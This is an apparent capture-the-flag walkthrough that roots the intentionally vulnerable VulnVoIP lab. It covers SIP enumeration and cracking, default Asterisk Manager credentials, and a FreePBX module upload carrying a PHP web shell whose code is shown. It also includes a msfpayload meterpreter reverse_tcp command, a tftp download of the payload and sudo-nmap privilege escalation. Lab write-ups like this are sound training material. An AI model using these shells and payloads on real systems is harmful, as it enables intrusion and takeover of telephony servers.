VulnVoIP (Vulnerable VoIP) Solutions

As promised here we shall discuss a couple of ways to get root on VulnVoIP with some enumeration
fun in-between!
Assuming youve located the IP address, you can run a port scan and will find the following services
listening (shortened for easy reference):

22/tcp open

53/tcp open domain

80/tcp open http

111/tcp open rpcbind

967/tcp open

3306/tcp open mysql

4445/tcp open

5038/tcp open asterisk

VoIP User Enumeration

In this demonstration Im using SIPVicious to enumerate the SIP device/users and to help crack
extension passwords.
The first thing to do is enumerate the end device. To do so we can use the command ./svmap.py
fingerprint 192.168.237.148

The next step is to locate valid SIP extensions. The initial command I used was ./svwar.py -D
192.168.237.148

As you can see no valid extensions are returned.

Its possible to specify the method used in the request. In this particular instance the INVITE request
brings back valid responses ./svwar.py -D -m INVITE 192.168.237.148

If all went well you should find that 6 extensions exist. The D option used in the previous command
just searches for default extensions, so its generally best to use a custom range. I also found that if
I specified the extensions to scan, i.e. e100-3000, only the lower extensions were found, hence it
may be best to split up long scans.
Now that weve located extensions we really want to crack the associated passwords. Again
SIPVicious can be used to perform this attack by using a command such as ./svcrack.py -u2000 -d
passwords.txt 192.168.237.148

You might find that some extensions are easy to crack, others are a bit more testing! In this
particular case, luckily, we have another unusual method of obtaining extension passwords.
Referring back to the port scan you can see that TCP port 5038 (Asterisk Call Manager) is open
and available to external probes! If you performed a vulnerability scan this may have shown up
stating that default credentials are in place.
It is possible to connect to the service using the telnet protocol on port 5038 with the default
username admin and password amp111.

Using the command action with the actual command of sip show users it is possible to pull out a
complete list of users, shown below:

The acm interface can also be used to locate voicemail users (useful for the next exercise!)

Note the interesting information highlighted in the above image.

A thorough list of acm commands can be found here

Further Exploitation
As weve located a single user with voicemail capability, and we have the extension password, it is
possible to use a soft-phone to log in with the credentials and attempt to gain access to the users
voicemail inbox. For this particular example Im using X-Lite.

Referencing Asterisk documentation its possible to see that *97 can be used to obtain voicemail. As
we dont know the voicemail password were going to have to bruteforce the manual way! Hint 0000
may get you in In case youre still struggling the voicemail goes along the lines of the following:

Hey Mark, I think the support web access account has been compromised. I have changed the
password to securesupport123 all one word and lowercase. You can log on at the usual address.
See you in the morning

After listening to the voicemail you should now have the username and password for the support
account. To test these out navigate to the HTTP interface and enter the credentials
support/securesupport123

Upon login youll be presented with the main administrative interface. A key piece of info is found in
the FreePBX version details (research for vulnerabilities).
One particular vulnerability of interest can be found here, of which an extract follows:
1.

Create a directory such as: webshell

2.

Create a PHP file webshell, i.e. webshell.php

o

3.

4.

Example.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>

Put this file into the webshell directory and create a tarball.

This compressed file name needs to follow the given rule, i.e. name-version.tgz.

The following command can be used to compress: tar -czvf webshell-1.0.tgz webshell/.
Upload via the FreePBX modules interface

Using the webshell to perform a basic command (to ensure all is working as expected).

I used msfpayload to create a reverse shell for ease of access.

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.237.129 LPORT=4448 X >
/root/vulnvoip/rev_shell.

The handler (exploit/multi/handler) was used to listen and wait for incoming connections.
TFTP can be used to upload the binary to the host using the PHP webshell as previously created,
by using the command tftp *HOST_IP*-c get rev_shell.
Permissions of the uploaded file will need to be altered, i.e. chmod 777 rev_shell - not a great idea
to use lax permissions like these in real life
Upon gaining access via the Meterpreter shell it makes things easier (continue reading)

Local Privilege Escalation

The usual tips and tricks work here. A little surprise is hidden in the sudoers file. Firstly well need to
locate the current user by issuing the command id which will show the user is asterisk. Issuing the
command sudo -l will then identify the commands that asterisk can run as root.

The user asterisk can surprisingly run nmap as root! Theres a little trick here

Weve got root!

Exploitation The Easy Way!

The following was covered in detail by Offensive Security and the write-up can be found here.
The version of FreePBX in use is vulnerable to an arbitrary remote code execution issue. Further
details can be found at exploitDB and Securityfocus.
From the reported details it is possible to see that a Metasploit module exists, this
beingexploit/unix/http/freepbx_callmenum.

Set the relevant options (note, the extension we use for this either has to go to voicemail or the call
needs to be answered). For this exploit were going to use the support extension. Well assume that
we havent yet cracked user credentials to any extensions and, this being the only one with
voicemail, leaves us with just one choice.
Exploit!

We have root shell. Now how cool and easy was that!

There are a few more funky things we can do with VulnVoIP, such as SIP spoofing. However well
cover that in a separate post and in the meantime have some fun!